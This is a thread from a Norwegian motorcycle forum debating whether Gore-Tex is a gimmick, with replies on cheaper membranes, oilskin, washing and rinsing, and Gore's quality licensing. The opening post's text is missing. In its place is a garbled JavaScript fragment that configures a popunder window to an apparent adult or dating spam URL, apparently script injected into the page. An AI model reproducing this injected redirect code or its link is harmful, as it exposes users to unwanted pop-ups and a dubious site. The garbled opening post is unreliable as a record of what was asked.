Gore-Tex er en gimmick?

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Online
Brukeravatar
Nomade
Innlegg: 655
Registrert: 17 jul 2016, 13:40
Motorsykkelen din: Honda NC750XD
Sted: Oslo

Gore-Tex er en gimmick?

Legg inn av Nomade »

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Greddy
Innlegg: 121
Registrert: 13 okt 2019, 00:13
Motorsykkelen din: Yamaha MT-10 SP, Tracer 900 GT, XT1200ZE

Re: Gore-Tex er en gimmick?

Legg inn av Greddy »

Gore tex er ikke gimmick. Det er bare de andre «inhouse» membranen som er 90% god, for en fraksjon av prisen det koster å ha Gore tex.

Brukeravatar
FredrikE24
Innlegg: 4718
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Gore-Tex er en gimmick?

Legg inn av FredrikE24 »

Nei, men det finnes andre membraner som kan gjøre det samme, for sikkert en lavere pris.

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gore-Tex er en gimmick?

Legg inn av SveinHa »

Jeg har alltid reagert på at de som selger GoreTex klær sier at du jevnlig MÅ impregnere klærne, gjerne med en gang før første bruk...

Nei, jeg holder meg til oilskin, enkel og velpsøvd teknologi med naturlig impregnering som varer i flere tiår om du ikke gidder vedlikeholde...
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
FredrikE24
Innlegg: 4718
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Gore-Tex er en gimmick?

Legg inn av FredrikE24 »

Det er motsatt av hva min Goretex-selger(Gore-Tex Pro) har sagt til meg.
Bruk plagget, vask det når det blir møkkete i vanlig maskin og FLYTENDE maskinsåpe.
steg 2, 3, 4 og 5 er å SKYLLE ut såpa. Dette tar en del runder, særlig på dagens maskiner som skal spare på vannet.
Jeg har fortsatt sett at etter andre skylling kommer det såpe i avløpet, jeg har vel på jakka skylt hvertfall 4 runder for å være sikker. Er det såpe igjen i plagget, så trekker det vann.

Så er det en tur i tørketrommelen.
Når det er kommet ut derfra så er det mykt, tett og fint å ha på seg.

Min Klim Kodiak-dress har jeg ikke vasket enda, men Badlands har jeg vasket etter en del vinterbruk. Den er godt brukt, men fortsatt like tett og fin. Ser litt medtatt ut på nært hold skal sies, men den er røft brukt.
Sist redigert av FredrikE24 den 30 nov 2023, 10:36, redigert 1 gang totalt.

Brukeravatar
Kjellrf
Innlegg: 1597
Registrert: 31 aug 2009, 15:15
Motorsykkelen din: Kawa, Honda og Guzzi
Sted: Sandefjord

Re: Gore-Tex er en gimmick?

Legg inn av Kjellrf »

En fordel med å kjøpe Goretex, er at der har Goretex godkjent hvordan deres membran blir brukt, med tanke på kvalitet på produktene som bærer deres logo. De andre membranfabrikantene selger stort sett til hvem som helst, og kvalitetssjekker ikke hvordan det brukes.
Medlem av Tønsberg mc klubb
Eier: Z1000A2, CX500, V7 Sport, ZZR600 E6
Har kjørt og eid mc siden 1980.

Svar